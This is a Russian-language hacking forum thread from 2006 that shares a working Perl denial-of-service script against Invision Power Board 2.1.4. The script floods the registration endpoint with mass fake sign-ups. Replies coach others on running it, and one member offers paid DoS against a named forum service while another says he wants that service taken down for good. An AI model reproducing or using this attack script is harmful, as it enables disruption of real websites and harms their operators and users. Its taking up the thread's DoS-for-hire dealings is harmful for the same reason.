Форумы Сплоит для IPB <= 2.1.4 DOS

Discussion in 'Уязвимости CMS/форумов' started by degeneration x, 20 Feb 2006.

  1. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    Нашел недавно, проверял на 2.1.4 работает отлично!
    Code:
    #!/usr/bin/perl
    use IO::Socket;
    ##########################################################
    ## _______ _______ ______ #
    ## |______ |______ | \ #
    ## ______| |______ |_____/ #
    ## #
    ##IPB Register Multiple Users Denial of Service #
    ##Doesn't Work on forums using "Code Confirmation" #
    ##Created By SkOd #
    ##SED security Team #
    ##http://www.sed-team.be #
    ##[email protected] #
    ##ISRAEL #
    ##########################################################
    
    print q{
    ############################################################
    # Invision Power Board Multiple Users DOS #
    #Tested on IPB 2.0.1 #
    # created By SkOd. SED Security Team #
    ############################################################
    };
    $rand=rand(10);
    print "Forum Host: ";
    $serv = <stdin>;
    chop ($serv);
    print "Forum Path: ";
    $path = <stdin>;
    chop ($path);
    for ($i=0; $i<9999; $i++)
    {
    $name="sedXPL_".$rand.$i;
    $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sed botbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1 &allow_member_mail=1&day=11&month=11&year=1985&agree=1";
    $len = length $data;
    $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
    print $get1 "POST ".$path."index.php HTTP/1.0\n";
    print $get1 "Host: ".$serv."\n";
    print $get1 "Content-Type: application/x-www-form-urlencoded\n";
    print $get1 "Content-Length: ".$len."\n\n";
    print $get1 $data;
    syswrite STDOUT, "+";
    }
    print "Forum shuld be Dosed. Check it out...\n";
    
     
  2. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    Кто ещё проверял?
     
  3. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Ну я эт скрипт недельки 2 назад юзал, тока чегото у меня ничего не сработало. Т.е скрипт то работает - плюсики там идут - но в конце пишет что типа хост в ДоСе - но нифга он не в Досе - работает как и работал. Может ошибочка есть?
     
  4. tester

    tester New Member

    Joined:
    18 Jul 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    for ($i=0; $i<9999; $i++) - что это? :D
     
  5. DooDlez

    DooDlez Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    39
    Likes Received:
    3
    Reputations:
    5
    Объясните, что скрипт вооще делает, что значит Dosed :rooleyes: ?.. Только не бейте :(...
     
  6. Inferno

    Inferno Elder - Старейшина

    Joined:
    30 Dec 2005
    Messages:
    97
    Likes Received:
    17
    Reputations:
    2
    Цыкл который будет выполнятся до 9999 а вобще хз!
     
  7. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    IPB Register Multiple Users Denial of Service
    Doesn't Work on forums using "Code Confirmation"
    Эти всё сказано. А вообще он пытается многократно зарегистрировать новых пользователей, DOS получается только в том случае, если на форуме не стоит бот-защита при регистрации(ввод случайной комбинации букв и цифр). А если бот-защита включена, то он сильно тормозит работу форума.
     
  8. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Dos - многократное обращение к серверу, что в итоге приводит его к ауту.
    Столько пользователей и регистрирутеся для этого.
     
  9. kirpunk

    kirpunk New Member

    Joined:
    18 Nov 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    а как его заливать? знаю что index.php? и что то там =)
     
  10. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    не куда ничего заливать не нужно, устанавливаешь active perl или чтото наподобие, и запускаешь со своей тачки... хотя можно и по другому, но в твоём случае я думаю нужен первый вариант
     
  11. SHiTS

    SHiTS КУЛХАЦКЕР

    Joined:
    11 Dec 2004
    Messages:
    186
    Likes Received:
    15
    Reputations:
    0
    За 6 мин скажите че за ошибка!!!

    The requested URL /forum/act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sed botbeta&EmailAddress=".$name."/@host.com&EmailAddress_two=".$name."/@host.com&allow_admin_mail=1 &allow_member_mail=1&day=11&month=11&year=1985&agree=1 was not found on this server
     
    1 person likes this.
  12. tester

    tester New Member

    Joined:
    18 Jul 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    нету здесь не какой ошибки, ошибки есть в запросе нефиг его с сплойта вытаскивать если ты даже не видешь в нем куски кода на пример:
    &UserName=".$name."& да и вобще получше почитай назначения сплойта а потом тыркай запросы
     
  13. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
    Он кактит только для 2.1.4 или покатит скажем на 2.0.*?

    Что собственно надо вбивать?
    Forum Host: - что ту вбивать?
    Forum Path: - ну это сам путь к форуму
     
    #13 Sprinter, 2 Mar 2006
    Last edited: 2 Mar 2006
  14. tester

    tester New Member

    Joined:
    18 Jul 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
  15. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
  16. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
  17. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
    1 вариант я как только не пытался. Не работает. Пишет
    3 вариант вроде плюсики пошли, жду.

    И ешё, что писать когда форум расположен на домене 3 уровня forum.форум.ru?
     
    #17 Sprinter, 4 Mar 2006
    Last edited by a moderator: 7 Mar 2006
  18. Stronger_se

    Stronger_se Elder - Старейшина

    Joined:
    6 Mar 2006
    Messages:
    32
    Likes Received:
    6
    Reputations:
    1
    кто нибудь когда нибудь смог сделать что нибудь на _http://www.goodboards.ru форумы с этого сервиса вообще не потдаються ниодному из раннее перечисленных способов ...
     
  19. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Stronger_se,
    я могу на два-три часа в даун отправить, если есть деньги - в ПМ
     
  20. Stronger_se

    Stronger_se Elder - Старейшина

    Joined:
    6 Mar 2006
    Messages:
    32
    Likes Received:
    6
    Reputations:
    1
    ........................................

    так я тоже могу .. но мне нужно вообще нах снести его .. или что нибудь посерьёзнее нескольких часов